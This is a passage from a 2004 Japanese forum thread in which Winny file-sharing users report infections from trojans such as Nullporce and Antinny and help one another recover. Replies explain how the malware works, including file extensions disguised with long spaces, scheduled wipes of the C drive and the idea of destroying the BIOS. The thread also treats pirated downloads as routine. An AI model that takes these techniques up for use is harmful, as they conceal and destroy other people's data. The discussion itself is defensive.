と言ってやった。そしたら俺をからかうように、なめてたやつを唇にはさんで口をとがらせた。
俺はその女の唇ごとキャンディーをほおばってやったよ。

今ではその女も俺の彼女。その時なめてたキャンディーはもちろんヴェルタースオリジナル。
なぜなら彼女もまた、特別な存在だからです。

81 :[名無し]さん(bin+cue).rar:04/08/10 21:51 ID:BMSLBZcT
>>27
調子乗んな、飽きた

82 :[名無し]さん(bin+cue).rar:04/08/10 21:53 ID:Nu0cewjf
>>80ワロタ

83 :[名無し]さん(bin+cue).rar:04/08/10 22:00 ID:AS5boi79
行間が空くの>>56のせい?


84 :[名無し]さん(bin+cue).rar:04/08/10 22:33 ID:qmH1qz8L
>>83
そうらしい

85 :[名無し]さん(bin+cue).rar:04/08/10 22:36 ID:NNxCbMHF
>>83
Q.1行おきに空白改行が入って表示される。

 A.通称 『 シリア語ブラクラ 』 と呼ばれてるもので、
   WindowsXP + IEコンポ使用の2ch専用ブラウザにて発動します。
   (それ以外の環境では問題なし。IEでも起きてたが最新版では修正済)
   フォント「Estrangelo Edessa」のシリア語文字 (Unicodeの1792番〜1871番)
   を表示する際の不具合を利用していますので、
   &#179 と &#18(←全て半角)を表示しない(あぼ〜ん、NGワード)設定にて回避できます。
   &#1963 と &#1965 も報告があったようですので、上記指定でも効かなければこちらも。
   シリア語のページなんて見ないよ!という人は、フォント「Estrangelo Edessa」を削除するという手もあります。
   対応を施したあとブラウザを再起動すればOK。

86 :ギコナビ使い:04/08/10 23:22 ID:ugfwrNZQ
>>85
きょうも、またひとつ、かしこくなりました。

2ch専用ブラウザにしか通用しない知識か・・・orz

87 :[名無し]さん(bin+cue).rar:04/08/11 00:27 ID:B81LqN1l
すみません、誘導されてきました。

画面の前面に♂♀の絵と、ギシギシアンアンな声が出てきて
操作不能になりました。
一応フリーのウィルスソフト入っていますが、起動できません。
再起動しても、ギシギシアンアン画面が消えません。

解決方法をどなたか教えて下さい。

88 :[名無し]さん(bin+cue).rar:04/08/11 00:32 ID:hpc6RRz0
>>34
詳細書けよ
どこを触ったらそうなったのか、操作不能ってどこまで操作不能なのか、起動できないってどう起動できないのか、再起動するとどうなるのか
ウィルスにひっかかって必死なのはわかるが最低限のこと書かなきゃ対応しようがない

89 :[名無し]さん(bin+cue).rar:04/08/11 00:38 ID:8B+n+xGc
>>hpc6RRz0
レス番狂ってますよん


90 :[名無し]さん(bin+cue).rar:04/08/11 00:43 ID:B81LqN1l
ごめんなさい。
落としたファイルのなかに入っていたものを実行しました。
一般コミック ワンピースの雑誌スキャンだと思います。333話かな。
種類はよくわかりません。拡張子はなかったです。
水色の枠に、中が白い四角のアイコンでした。infoseekとか書いて
あった気がします。
alt+ctrl+delを押すと、ログオフはできますがシャットダウンは
できません。ボタンが押せなくなっています。
タスクマネージャーは押せますが開きません。
その他キーを押してもクリックしても反応ありません。
起動時にF8を押すと、拡張オプションメニューはでました。
お願いします

91 :[名無し]さん(bin+cue).rar:04/08/11 00:51 ID:H/Ddcc4e
↑win2kだそうです。>スレ住人
XPの私には日本語自体理解できません。

92 :[名無し]さん(bin+cue).rar:04/08/11 00:55 ID:B81LqN1l
ああ、ごめんあさい。os忘れていました。
なんだかビックリしているようです。

93 :[名無し]さん(bin+cue).rar:04/08/11 01:05 ID:Brrg3EYk
>>92
>>88さんの言うようにどこまで操作可能か書かないと何ともいえない。
セーフモードで起動できるか?スタートボタンは使えるか?
レジストリエディタは使えるか?マイコンピュータ開けるか?
とか詳細に。
全く操作不能なら、再インストールしかない。

94 :[名無し]さん(bin+cue).rar:04/08/11 01:07 ID:ji851k2l
すいません2chブラウザつかわずIEだけで見てるのに1行間隔あいてるんですけど・・・
IEだけの人でも >>88 さんの方法使えるんでしょうか?

95 :94:04/08/11 01:08 ID:ji851k2l
>>85さんでした失敬

96 :[名無し]さん(bin+cue).rar:04/08/11 01:17 ID:oRybC+iv
>>95
IEにあぼーん機能があれば出来ると思うが。
最新版入れるか当該フォント削除するのが良いと思う。

97 :[名無し]さん(bin+cue).rar:04/08/11 01:27 ID:nDNBk3kC
次号予告.EXE
にかかった者です
一週間以上何もなかったから処理できてると思ったら時限式だったらしい全部ファイル消えた
今携帯から書き込みしてる
ほかの人も気を付けて

98 :[名無し]さん(bin+cue).rar:04/08/11 01:28 ID:aFxiFei4
馬鹿な質問を一つさせて下さい。
再インスコを不可能にさせる恐怖ウィルスというのは制作可能でしょうか?

99 :87:04/08/11 01:32 ID:B81LqN1l
>>93
87です
すみません。ウィルスに感染したことがなくて、
どの程度情報が必要なのか、まったくわかりません。
よろしくご指導ください。

セーフモードでは起動できました。
マイコンピューターは開けます。スタートボタンも開きます。
ウィルスソフトを起動させようとしたら、ウィルスが起動しました。
レジストリエディタおよび、コンパネのファイルの削除でも
ウィルスが起動してしまい、使えません。

通常起動では、スタートボタンは出る時がありますが、
スタートアップという項目は空です。
スタートボタンはシャットダウンするボタンがなく、
どのソフトも立ち上がらない状態です。

100 :87:04/08/11 01:47 ID:B81LqN1l
今日はもう寝ます。明日またがんばります。おやすみなさい。

101 :[名無し]さん(bin+cue).rar:04/08/11 01:54 ID:nqjZjntx
この自己中っぷりは以前の天然粘着野郎の様だな

再インストールって指導してるのに

102 :[名無し]さん(bin+cue).rar:04/08/11 02:59 ID:uuiYmX1E
>>99
くれぐれも、フォーマットしてから再インストな
再起動を繰り返すもんだから、システム関連ファイルまで汚染が広がってるだろ
もう手遅れ。

103 :[名無し]さん(bin+cue).rar:04/08/11 03:06 ID:dAZbW7/B
>>97
同様の症状でてます多分。
ただ以前も含めてウィルスには感染(駆除は一応したはずだったが・・・)しているのでそれが原因かもしてませんが。




104 :87:04/08/11 07:37 ID:B81LqN1l
>>101-102
はあ、すみません。
でも感染したの初めてなので、以前の方とは違うと思います。
フォーマットしてきます。
大変有り難うございました。

105 :[名無し]さん(bin+cue).rar:04/08/11 09:18 ID:zU33Z6Wd
>>98
強いて言うならBIOS破壊。ブートすらできなくなる。
最近はDualBIOSとか自動復旧ブートモードとかあるから、それなりに知
識のあるやつだと意味ないっぽいけどね。

106 :[名無し]さん(bin+cue).rar:04/08/11 09:59 ID:plZKWaO+
Registry Prot スタートアップを監視するシンプルなソフト
ttp://www.diamondcs.com.au/index.php?page=regprot

107 :[名無し]さん(bin+cue).rar:04/08/11 12:14 ID:es8QgAAZ
>>99
ウィルスソフトを起動したのだからウイルスが起動されて当たり前なのでわ?

108 :[名無し]さん(bin+cue).rar:04/08/11 15:10 ID:IXCPO8MP
>>98

絶 対 作 る な よ

109 :[名無し]さん(bin+cue).rar:04/08/11 15:14 ID:CiRSo0gN
てことは作れるのか…

110 :[名無し]さん(bin+cue).rar:04/08/11 15:30 ID:tayT4e18
>>85
スレ違いだが、無事解決できたよthx!!

111 :[名無し]さん(bin+cue).rar:04/08/11 15:58 ID:v6zGhtfw
XPを使っています。ウイルス総合スレッドから誘導されてきました。

AVGというソフトを使っているのですが、
trojan horse backdoor.agent.2.h
がフォルダから見つかったとのエラーが何日か前から出るようになりました。
いままで弊害はありません(警告メッセージが出まくるのが邪魔な事くらい)。

どうやって駆除すればよいでしょうか?


112 :[名無し]さん(bin+cue).rar:04/08/11 16:07 ID:AKy8mFFr
183 名無しさん@お腹いっぱい。 sage New! 04/08/10 21:00
環境:自作、WindowsXP Pro SP1、AVG Ver 6.0.734
利用:インターネット、メール、画像閲覧・編集、WinMX

3日ほど前WMP9で音楽を聴いている最中にAVGが
trojan horse backdoor.agent.2.h
と表示してきました。駆除できないようで
このメッセージが頻繁に出てきて、OKを押すのを4・5回繰り返した
ときもありました。
ネット見ても情報がないので対策はどうすればいいでしょうか?



184 名無しさん@お腹いっぱい。 sage New! 04/08/10 21:04
>>183
>利用:WinMX← ここが何のスレかわかってる?





113 :[名無し]さん(bin+cue).rar:04/08/11 16:33 ID:4mwy06BI

【使用OS】windowsXP home
【WindowsUpdateしてるか】してます
【AntiVirusは】norton anti virus
【ちゃんとUpdateしてるか】してます
【スキャンした結果】異常なし
【オンラインスキャンしたならその結果は】異常なし
【Winnyのバージョン】v2.0b7.1
【Winny歴、 一年半
 総DL量は  わかりません
【テンプレを読んだか】読みました
【テンプレにある対策を実行したか】該当例が見つかりませんでした
【症状か具体的に、分かる限りすべて書く】
explorer.exeがおかしな動きをし始めて
コンピューター使用率が常に100%になりまして、
で、再起動してnyいれてるHDのファイルいじろうとすると
また、explorer.exeがおかしな動きをし始めて
コンピューター使用率が常に100%に。
でしばらくしたらノートンが
「Backdoor/subseven トロイの木馬のデフォルトが(ip)を遮断しました。」
という警告を出してからは特に以上は見られません。
【何をしたらそんなことになったのか】昨日aviファイルを再生しようとしたら
【これまでにとった措置】
aviファイルの削除。
で、何回か再起動してたらなんともなくなったのでとりあえず放置してます。

このような動きをするウィルスをご存知でしたら対処法を教えてください。
あとaviファイルを再生しようとしてウィルスに感染しようとすることなんて
あるんですかね?

114 :[名無し]さん(bin+cue).rar:04/08/11 16:38 ID:zU33Z6Wd
>>112
その都合の良すぎる解釈に乾杯だな(w。
ネットで見ても情報が無いそうだが、これは幻なんだろうか。
ttp://www.google.co.jp/search?q=cache:8O5z0WYzbPYJ:pc5.2ch.net/test/read.cgi/sec/1086672009/l50+trojan+horse+backdoor.agent.2.h&hl=ja&lr=lang_ja

>>113
どうせ「.avi(長いスペース文字).exe」のパターンかと。
拡張子表示しとけば、簡単に避けられるトラップ。

ttp://www.symantec.com/region/jp/sarcj/data/b/backdoor.subseven.html

115 :[名無し]さん(bin+cue).rar:04/08/11 16:41 ID:tPU89FNQ
>>113
aviとトロイは別件じゃね?
破損aviを再生、もしくはそれに準拠する状態にするとbusyになるってのはWindowsのデフォ

つか今時Subsevenっすか
これって5年ぐらい前のトロイじゃねーか?

116 :[名無し]さん(bin+cue).rar:04/08/11 16:55 ID:4mwy06BI
>>114-115
レスありがとうございます。
詳細表示はしています。
確かにそのaviファイルは途中で強制変換して
捏造かどうか調べたときのものでした。
Subsevenもノートンがきっちりブロックしたようですし・・・
それらを考えると、どうやら115さんの言うとおりのようです。ほっとしました。
お騒がせしてすいませんでした。
レスくれたかたありがとうございます。


117 :113:04/08/11 17:04 ID:4mwy06BI
レジストリの値の改ざんもなかったのでSubsevenの感染もないようです。

118 :[名無し]さん(bin+cue).rar:04/08/11 17:11 ID:tayT4e18
>>117
explorerが100%になるだけなら、うちなんてしょっちゅうだよ。
aviの重たいファイル再生したり、部屋が暑かったりしたら。

119 :[名無し]さん(bin+cue).rar:04/08/11 17:15 ID:VQdEkG29
【使用OS】Me
【WindowsUpdateしてるか】している
【AntiVirusは】ウイルスバスターを使用
【ちゃんとUpdateしてるか】している
【スキャンした結果】他のAntinnyがわんさか。それは駆除
【オンラインスキャンしたならその結果は】していない
【Winnyのバージョン】v2.0b7 1
【Winny歴、総DL量は】2ヶ月 不明
【テンプレを読んだか】読んでいる
【テンプレにある対策を実行したか】実行中
【症状か具体的に、分かる限りすべて書く】キンタマ
【何をしたらそんなことになったのか】多分、過去に不審なexeを実行したかもしれない。
【これまでにとった措置】
システムの復元機能を無効にする。
(略)
WINDOWS\win.ini、WINDOWS\system.iniに、キンタマっぽいのがWinnyのパスを書いていた場合そのパスのみを削除。
ここまで実行したのですが

regedit.exe、regedt32.exe を復元
実行しようとしたのですが、キンタマに感染していた頃のバックアップ
しかありません。その頃のバックアップを実行しても大丈夫でしょうか?
もし、駄目な場合は、どうすれば良いのでしょうか?

120 :[名無し]さん(bin+cue).rar:04/08/11 17:21 ID:4mwy06BI
>>118
CとかDいじっても何にも起こらないのに外付けのHDをいじると
いきなりexplorerががんばりだすので(ずっと)
これは何かあるのかなとおもっていたところに
ノートンの警告が出てきたものですから。
こりゃヤバイと思いまして。

121 :[名無し]さん(bin+cue).rar:04/08/11 18:10 ID:CMcDvZya
次回予告.exe=時限式whiter
ってこと?

122 :[名無し]さん(bin+cue).rar:04/08/11 18:13 ID:fUCkK4F0
なんかwinnyのフォルダに勝手にうpファイルが制作されてしかも
そのなかに見覚えのないファイルが600Mも入ってるんですが。。。
助けて下さい!!!

123 :[名無し]さん(bin+cue).rar:04/08/11 18:17 ID:AKy8mFFr
>>122 このスレとリンク先を全部読めば対処法があるよ
    読んで理解できないなら再インスコなりリカバリなりしよう

124 :120:04/08/11 18:21 ID:4mwy06BI
>>121
それって俺ですか!?

125 :[名無し]さん(bin+cue).rar:04/08/11 18:42 ID:fUCkK4F0
>>123
分かりません!!泣

126 :[名無し]さん(bin+cue).rar:04/08/11 18:58 ID:oRybC+iv
('A`)
>>124
お前のことじゃない。

>>125
再インストール
('A`)ノ

127 :[名無し]さん(bin+cue).rar:04/08/11 19:13 ID:Tbmp2QA0
次号予告.EXE
やられた。

ガリガリガリガリガリガリガリガリガリガリガリガリガリガリガリ


次号予告=時限式whiterだな。

128 :[名無し]さん(bin+cue).rar:04/08/11 19:29 ID:nA8xMZMN
次号予告=時限式whiterとして、潜伏先はどこだったんだろう?

129 :127:04/08/11 19:32 ID:Tbmp2QA0
WhiterVBS簡易チェッカーに反応なかったです

130 :[名無し]さん(bin+cue).rar:04/08/11 20:28 ID:4qtjnWCa
>>127
ガリガリじゃ解らん。
被害を詳細に報告してくれんと。

131 :[名無し]さん(bin+cue).rar:04/08/11 20:30 ID:1kXBMV4x
ガリガリガリガリガリガリガリガリガリガリガリガリガリガリガリ君喰いてー

132 :[名無し]さん(bin+cue).rar:04/08/11 20:31 ID:4mwy06BI
>>127
時限式でもレジストリにWhiterナンタラができるんですか?

133 :[名無し]さん(bin+cue).rar:04/08/11 20:34 ID:FHnPCWvl
>>130
そうですねぇ。
次号予告.exeあぼーんくらった人は、モニターに何か変化はなかったか、
とか、くらって何日であぼーんになったとか、再起動なんかいぐらいした
とか、その他気付いた事を報告してくれるとありがたいのですが。

134 :[名無し]さん(bin+cue).rar:04/08/11 20:38 ID:hpc6RRz0
誰か例の.scrのウィルスの対処法教えて
壁紙が蓮コラになる奴
今は被害はこれだけだけど時限式のウィルスのことを聞いて不安になってきた
お願いしますm(_ _)m

135 :[名無し]さん(bin+cue).rar:04/08/11 20:43 ID:+xumgPaY
1 :擬古牛φ ★ :04/08/09 22:44 ID:???
★胸に打球受け、野球部員死亡 福島県立湯本高

 福島県いわき市の県立湯本高校で7日にあった野球部の練習試合で、投手をしていた
1年生の成田知樹君(15)が左胸に打球を受け、約8時間半後に死亡した。死因は
胸部強打による心室頻拍。同校は9日、全校生徒と保護者に事故を説明した。
 同校によると、対戦相手は別の県立高。先発した成田君は3回裏、打者のライナーを
左胸で受け、打球の転がった方向へ数歩歩いたところで倒れた。
 成田君は、中学3年生の時にはいわき市の選抜野球チームで投手兼野手をつとめ、
全国大会で3位に入賞していた。

朝日新聞 http://www.asahi.com/national/update/0809/020.html

http://news18.2ch.net/test/read.cgi/mnewsplus/1092059046/l50

136 :[名無し]さん(bin+cue).rar:04/08/11 22:12 ID:xfBSZTLr
>>133
タスクスケジューラに毎週火・木・土の23:15にCドライブ全消しするよう登録される


137 :[名無し]さん(bin+cue).rar:04/08/11 23:52 ID:uuiYmX1E
だとしたら防御法としては、事前にサービスの設定で、
タスクスケジューラを無効にしとけばいいのかな?

138 :[名無し]さん(bin+cue).rar:04/08/12 00:18 ID:qb4kNrbX
>>133

モニターに何か変化はなかったか
→モニター自身には問題無かった。

くらって何日であぼーんになったとか
→感染したのはデスノートDLして閲覧した日としたら8/6。8/7はPC起動してません。「かっ飛ばせ〜」が出たのは8/8夜。アボーンっしたのは8/9夜だった。

再起動なんかいぐらいした
→かなりした。

その他気付いた事
→スタートアップに最初あったファイル(「かっ飛ばせヌルポーズ」だった?)を削除した後に再起動したら同じ所に「ねらいうち」というファイルができていた。


139 :[名無し]さん(bin+cue).rar:04/08/12 03:49 ID:Ji+GNZCa
>>11のヤツがNAVでW32.SillyP2Pと検出された。

140 :[名無し]さん(bin+cue).rar:04/08/12 07:04 ID:/b2w+fxF
>>139 情報どうも 先生は対応したのか うちも先生でよかった

141 :[名無し]さん(bin+cue).rar:04/08/12 10:53 ID:KaZFm6Lt
質問。
zipやlzhで固めてある画像の中に.folderや.exeが入ってた場合
圧縮ファイルごとビューアに放り込んだらどーなんの?
世の中にはVixとかSusieとかマンガミーヤなどなどいろんなビューアがあるけど
ものによっては感染しちゃう場合もあるのか?

142 :[名無し]さん(bin+cue).rar:04/08/12 11:24 ID:5SwQ6ljC
>>141
私達がそのビュアーの動作を全て細かく知っているとでも思ってるの?
それは作者しかわからないところもあるでしょ。
全部の作者に聞いてきなさい、そしてこのスレに還元しなさい。

143 :[名無し]さん(bin+cue).rar:04/08/12 11:24 ID:n5alw3z4
【使用OS】 XP
【WindowsUpdateしてるか】 してます
【AntiVirusは】 ノートンインターネットセキュリティ2004
【ちゃんとUpdateしてるか】 してます
【スキャンした結果】 W32.AntiWinny が検出されました
【オンラインスキャンしたならその結果は】  削除できません
【Winnyのバージョン】 v2.0b7 1
【Winny歴、総DL量は】 1年 不明
【テンプレを読んだか】 熟読
【テンプレにある対策を実行したか】 隠しフォルダを表示するようにしました。
                      テンプレに書いてあると事を調べたが怪しいものは無し。
【症状か具体的に、分かる限りすべて書く】 スタートから「接続」が消えました。Alt+Ctrl+Deleteで再起動できない。
【何をしたらそんなことになったのか】 mpgを実行したら、 フリーズしました。極窓で調べたらlzhでした。
【これまでにとった措置】 モデム回線をpcから抜きました。

今まで、exe,zip,lzhには気をつけてましたが、まさかmpgで偽装してるとは・・・
かなりショックです。
やはりフォーマット+再インスコでよろしいですかね?
よろしくご教授ください。

144 :[名無し]さん(bin+cue).rar:04/08/12 11:27 ID:5SwQ6ljC
イミワカラン箇所が随所にある

145 :[名無し]さん(bin+cue).rar:04/08/12 11:28 ID:KaZFm6Lt
つまり可能性がないとは言えないっつーことね?
それだけわかればいいや。

146 :[名無し]さん(bin+cue).rar:04/08/12 11:29 ID:KaZFm6Lt
>>145>>142宛て

147 :[名無し]さん(bin+cue).rar:04/08/12 11:33 ID:5SwQ6ljC
>>145
もちろん万能ビュアを作ろうとして書庫内のexeまで実行してしまうソフトウェアだって作れるでしょ。
様は作者次第、ソフトウェア次第

148 :[名無し]さん(bin+cue).rar:04/08/12 11:34 ID:n5alw3z4
>>144
スマソ。

【オンラインスキャンしたならその結果は】  削除できません ←先生でも削除できませんでしたという意味です。
他にご不明な点がありましたら言ってください。


149 :[名無し]さん(bin+cue).rar:04/08/12 11:39 ID:5SwQ6ljC
>スタートから「接続」が消えました。Alt+Ctrl+Deleteで再起動できない。
詳しく。省略せずに

>mpgを実行したら、 フリーズしました。極窓で調べたらlzhでした。
詳しく、省略せずに。(○○というファイルをダブルクリックしたら〜というソフトウェアが起動して・・・のように)

150 :143:04/08/12 11:50 ID:n5alw3z4
>>149
レスありがとうございます。
1.スタートから「接続」が消えました。
2.Alt+Ctrl+Deleteで再起動できない。
3.mpgを実行したら、 フリーズしました。極窓で調べたらlzhでした。
1.について 
  電源を5秒間押し強制終了してから電源を入れ、ネットに接続しようと
  スタートをクリックし「接続」ボタンを探したらなくなってました。
  現在はIEのアイコンをクリックすることで接続が出来ることが判明したので問題解決です。
2.について
  文字通りフリーズしたときに再起動できませんでした。
3.について
  「デイ・あふたーry(サイズ1.2G)」をnyでDLしてキャッシュ変換してるときに固まり
  強制終了をして再起動して変換し終わっていたmpgをクリックしたらまた固まりました。
  その後「全スキャン」をしたらW32.AntiWinny が検出されました。
  しかもノートン先生でも「削除できません」ということでした。
  そして極窓でみたらlzhでした。
  ソフトウェアが起動しませんでした。

ということです。

151 :143:04/08/12 11:54 ID:n5alw3z4
>>150
×>ソフトウェアが起動しませんでした
○>ソフトウェアは起動しませんでした

です。

152 :[名無し]さん(bin+cue).rar:04/08/12 11:54 ID:9Ir6qFfV
>145
>つまり可能性がないとは言えないっつーことね?

可能性が0なんてありえないわけだが
つーか試せるんだから自分で試せよデブ

153 :[名無し]さん(bin+cue).rar:04/08/12 12:04 ID:5SwQ6ljC
>>150
1.タスクバーのプロパティとかで接続という項目を復活できないかな(XP詳しくないのでフォローよろ)
2.省略
3.mpgファイルはダブルクリックじゃなくて選択しただけでエクスプローラが固まったのか
  それともWMPが起動して固まったのか。
  AntiWinnyが検出されたのはそのmpgファイル(lzhらしいけど)だったのか、それともほかのファイルなのか。
  mpgに偽装されたlzhファイルなら、lzhファイルの中をノートンが覗いて書庫内のファイルを検出した可能性があります、再度確認して下さい。

  もしlzhファイルの拡張子をmpgに変更しただけのファイルをクリックしたのなら、解凍していない限りはウイルスに感染することはないよ。
  ノートンが削除できないって言っているのはlzhファイルの書庫の中にあるからなのかも。(書庫内のファイルをいじれない為)
  エクスプローラが固まるのは不完全なmpgだから(変換途中でWinnyがフリーズして再生できないmpgファイルになった)

154 :[名無し]さん(bin+cue).rar:04/08/12 12:11 ID:/b2w+fxF
>>150 >【テンプレにある対策を実行したか】 隠しフォルダを表示するようにしました。
    これって感染してから実行したの? それとも以前から?
    感染が判明してからやったのでは意味ないと思う
    前にアイコン偽装した,exeを踏んだ可能性もあるよ

155 :[名無し]さん(bin+cue).rar:04/08/12 12:17 ID:tsjqH8w7
>>143
>>153も言ってるようにmpg実行で感染することはない。
単に実行前のウィルスを検出しただけか、
あるいはノートンを入れるより前から感染してたのに今気付いただけだろう。
そのノートンはいつ頃導入したんだ?
つーかノートンが入ってるのに何故オンラインスキャンをする必要があるのかがまず疑問なんだが、、
ノートンインターネットセキュリティってまさかPFWのほうだけしか入ってないと言うオチじゃないよな。

156 :[名無し]さん(bin+cue).rar:04/08/12 12:18 ID:9TX1N/E6
リアルタイム保護切ってて定時スキャンもやってなかったとか

157 :[名無し]さん(bin+cue).rar:04/08/12 12:36 ID:jsHhtlFQ
>>150
とりあえず、漏れからいえることは「落ち着け」

158 :[名無し]さん(bin+cue).rar:04/08/12 12:46 ID:Bhco/bzm
>>153
真っ当なノートンなら書庫内のウィルスも削除ってくれるぞ

.gcaはアカンかったけどなw

159 :かかったさん:04/08/12 13:01 ID:I0K0QRVz
ヌルポーサーに朗報!!
漏れも2、3日前に
null porce2 あぼーん→ok→HDD削除されかかって
急いでそれっぽい奴タスクから削除してくいとめたっぽいんだけど
その後フリーソフトの復元って奴かけたらどんどん復活させていってくれてるぞ!!
だけどめちゃくちゃスピードが遅くて48時間たった今、本当にだいじょぶか!?
とおもって強制終了させてみたら見事に2.6GBほどふっかつしてたよ!!
何百ギガも復活させたらそら一月ぐらいかかりそうだけど大事な写真やら書類やら
小さい奴ならそれやってすぐ焼いてから再インスコなんてのもありじゃないかな?
ウランちゃんもあれ以来いじってなければやってみれば?

160 :[名無し]さん(bin+cue).rar:04/08/12 13:06 ID:8lUHI4Io
nyのキャッシュからファイルに変換する際のプロセスを悪用して
キャッシュ爆弾を仕掛けるということはできないのだろうか…

で、あったらイヤだけどなぁ。 zipの圧縮爆弾は普通にあるしね。

161 :[名無し]さん(bin+cue).rar:04/08/12 13:06 ID:tsjqH8w7
マジなのかネタなのかコピペなのか、、

162 :[名無し]さん(bin+cue).rar:04/08/12 13:07 ID:9TX1N/E6
新しいテンプレ

163 :159:04/08/12 13:17 ID:I0K0QRVz
いや、まじです。
たぶん上書き削除じゃないからじゃないですかね?
あんま詳しいことはわからないですけど・・・(汗
お金払った奴ならもっとスピードが速いんですかね?

164 :[名無し]さん(bin+cue).rar:04/08/12 13:34 ID:kIWaMNYW
>>136が書いてくれてるタスクスケジューラの内容によるんでないかと。
単なるDeleteだけなら「復元」みたいなFAT再構成ソフトでも有効かと。

165 :[名無し]さん(bin+cue).rar:04/08/12 13:37 ID:8lUHI4Io
ttp://www.vector.co.jp/magazine/softnews/020601/n0206013.html

まぁ、「復元」が成功するかどうかは運次第だな。
ヌルポ系の上書きだと、部分的にしか書かないから、容量の大きなファイル
だと救える可能性もある。ただ、mpeg/aviはヘッダが壊れるし、jpegも厳しい
text系だと、内部情報を拾えるかも。単純なファイル名削除だけなら、ほぼ救える。

有料も無料も、HDDのセクタを直接読み出してファイルにするので、あんまり速度に変わりはないかな


166 :[名無し]さん(bin+cue).rar:04/08/12 13:58 ID:5SwQ6ljC
いつの間にかNTFSにも対応してたのか

167 :[名無し]さん(bin+cue).rar:04/08/12 16:34 ID:7iRYxqqy
きた
http://www.itmedia.co.jp/enterprise/articles/0408/12/news038.html

168 :143:04/08/12 16:39 ID:n5alw3z4
>>153
細かなアドバイス感謝しております。
今出先ですので戻り次第>>153を読みつつ修復したいと思います。
また続報を書きますのでよろしくお願いいたします。

>>154
感染後に隠しフォルダを表示するようにしました。
今後気をつけます。

>>155
ノートンでスキャンしたときにそのファイルの場所まで教えてくれなかったので
オンラインスキャンをしようと思ったわけです。
ノートン先生一応全部入れてますw

>>157>>158
サンクス!落ち着いて家に帰ってから修復してみます。


169 :[名無し]さん(bin+cue).rar:04/08/12 16:50 ID:g+MYht0m
        ┼─┐─┼─  /  ,.          `゙''‐、_\ | / /
        │  │─┼─ /| _,.イ,,.ィ'    ─────‐‐‐‐ゝ;。←>>ヌルポース
        │  |  │     |  |  | イン ,'´ ̄`ヘ、   // | \
                          __{_从 ノ}ノ/ / ./  |  \
                    ..__/}ノ  `ノく゚((/  ./   |
        /,  -‐===≡==‐-`つ/ ,.イ  ̄ ̄// ))  /   ;∵|:・.
     _,,,...//〃ー,_/(.      / /ミノ__  /´('´   /   .∴・|∵’
  ,,イ';;^;;;;;;;:::::""""'''''''' ::"〃,,__∠_/ ,∠∠_/゙〈ミ、、
/;;::◎'''::; );_____       @巛 く{ヾミヲ' ゙Y} ゙  ぬるぽ ぬるぽ オートラン♪
≧_ノ  __ノ))三=    _..、'、"^^^     \ !  }'.   ヌルポ ヌルポ  AutoRun♪
  ~''''ー< ___、-~\(          ,'  /    ぬるぽ ぬるぽ オートラン♪
      \(                 ,'.. /     おまえが踏まなきゃ誰が踏む!
      \(                 ,'.. /

170 :[名無し]さん(bin+cue).rar:04/08/12 16:50 ID:/b2w+fxF
>>167 衝撃のダイヤログ ワロタw
    
    でも明日は我が身って言うしなヽ('A`)ノ 

171 :[名無し]さん(bin+cue).rar:04/08/12 16:50 ID:5SwQ6ljC
>>167
記事の本文にガッ

余談だけど
>「ほげほげ.rar .exe」や「ほげほげ.zip .exe」のように、間に長いスペースを加えることによって、
>一見すると実行形式のファイルに見えないよう偽装する

って部分、ソースを見ると
>「ほげほげ.rar                  .exe」や「ほげほげ.zip                  .exe」のように、

という風に一応長いスペースを入れてるんだね。
AA職人だと常識だけど連続の空白をHTMLで表示するときは半角スペースはご法度なのに
ITMEDIAはまだまだ発展途上だね。

172 :[名無し]さん(bin+cue).rar:04/08/12 17:07 ID:6fiqiUCy
Winny経由で広まるトロイの木馬「Nullporce」
http://live14.2ch.net/test/read.cgi/news/1092296073/

からきまつた
ここ最近nyウイルス進展無かったからここ監視してなかったけど
こんな(((( ;゚Д゚)))ガクガクブルブルなやつがでてたのね
一応感染はしてなかったけど
知らなかったらその内確実に感染してたなぁ

ついでにLhaplusの最新ver置いておきますね
既出だろうけど

http://park14.wakwak.com/~schezo/

Lhaplus Version 1.25 [ 2004/08/11 ]

ああ、ここのやつらはWinRAR使ってるか
俺どうもあれ好きになれないんよ

173 :[名無し]さん(bin+cue).rar:04/08/12 17:13 ID:tsjqH8w7
Winrarなんぞ使わんでもnoahやexplzhなどの大手アーカイバはすでに対応してるし。

174 :[名無し]さん(bin+cue).rar:04/08/12 17:18 ID:7eqXYulv
【使用OS】 Windows98

UPフォルダが自動的に作られることはないんですが、自分でUP用のフォルダを
指定すると(例:C:\WINDOWS\デスクトップ\あいうえお)、そのフォルダは認識されずに
C:\にあるファイルを勝手にUPファイルにしてしまうようになっちゃってます。
一週間ほど前に 次回予告.exe を見つけて削除しましたが、特におかしい症状はないです。
フォルダ指定を削除してWinnyを再起動するともとにもどってるので被害はないようなのですが、
気になってます。スキャンしてもウイルスは検出されませんでした。

175 :[名無し]さん(bin+cue).rar:04/08/12 17:32 ID:unuDEqAu
>>174
報告乙w

176 :[名無し]さん(bin+cue).rar:04/08/12 17:32 ID:FcHwgZd8
>>167
>>171でも指摘されているけど、他にも細かいミスがイパーイあるので
修正シロツーホーしとくよ。夜になったらもう一回見てくれ。まずは
ITmediaトップにある「ぬるぽ?」の後ろにガッ!を入れさせないとな。


「衝撃のダイヤログ」がでるから、このヌルポースにantinnyのような
再配布機能があっても、大規模感染はないと思われ。
あのダイヤログがでても( ´_ゝ`)フーンって香具師いるかね?

177 :[名無し]さん(bin+cue).rar:04/08/12 17:49 ID:pH7kiShH
はっきり言って、ny専PCさえあれば感染しようが何だろうが全然関係ない。
重要ファイルは別PCに随時移し、仮に感染したらOSごと再インスコ、以上。
光だからまたすぐに集まるし、変に修復かけるより心理的にも上々。

178 :[名無し]さん(bin+cue).rar:04/08/12 18:04 ID:DhnCHZX7
>>174
とりあえず、タスクスケジューラにどんなタスクが入ってるか教えてくれ。

179 :[名無し]さん(bin+cue).rar:04/08/12 18:13 ID:xb+zBnUL
某ソフトインスコしたらブラウザにalexaツールバーとかいうのが勝手に追加されたっぽいんだが、これって嫌がらせ?
やたら重いし。システムフォルダにあったalexa消したらでなくなったけどさ。


180 :[名無し]さん(bin+cue).rar:04/08/12 18:15 ID:pjO6w2BF
>>179
スパイウェアだぞ

181 :[名無し]さん(bin+cue).rar:04/08/12 18:56 ID:7eqXYulv
>>178
アプリケーションの起動チューンアップ
メンテナンス - デフラグ
メンテナンス - スキャンディスク
メンテナンス - ディスク クリーンアップ

↑こういうのですけど。 Walign.exeっていうのは無害?

182 :[名無し]さん(bin+cue).rar:04/08/12 19:03 ID:DGuLljMw
>>181
デフォルト設定のままみたいだね。
NullPorceだと、そこにCドライブ消去が入るらしい。

Walign.exeは標準で入ってるメンテナンス用ツール。
